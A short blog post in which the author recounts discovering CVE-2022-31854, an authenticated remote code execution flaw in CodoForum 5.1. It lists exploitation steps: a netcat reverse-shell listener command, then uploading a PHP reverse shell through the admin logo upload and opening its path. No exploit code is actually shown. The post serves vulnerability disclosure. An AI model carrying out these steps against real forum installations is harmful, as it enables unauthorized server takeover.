CodoForum V5.1 authenticated RCE | My first CVE

Vikaran
Jul 5, 2022

--

This article is going to be about how I found my first CVE(Common Vulnerabilities ad Exposures)/zero-day vulnerability.

Vulnerable Application and CVE details

Name: CodoForum
Version: 5.1
Vendor: CodoLogic
CVE ID: CVE-2022-31854
Vulnerability type: Authenticated Remote Code Execution via File Upload

Exploit

  1. Start a NetCat reverse shell on the attacker machine
nc -lvnp 9999

2. Login to the admin panel

3. Go to the ‘Global Settings’ pane

4. Edit the IP and port number in the reverse shell file

5. Upload the reverse shell from the logo upload option

6. Once uploaded, access the file from the path http://[codoforum site]/sites/default/assets/img/attachments/[file].php

7. Go to the path and get shell access from the NetCat connection established earlier

PWNED!

Exploit code:

Unlisted

--

--

No responses yet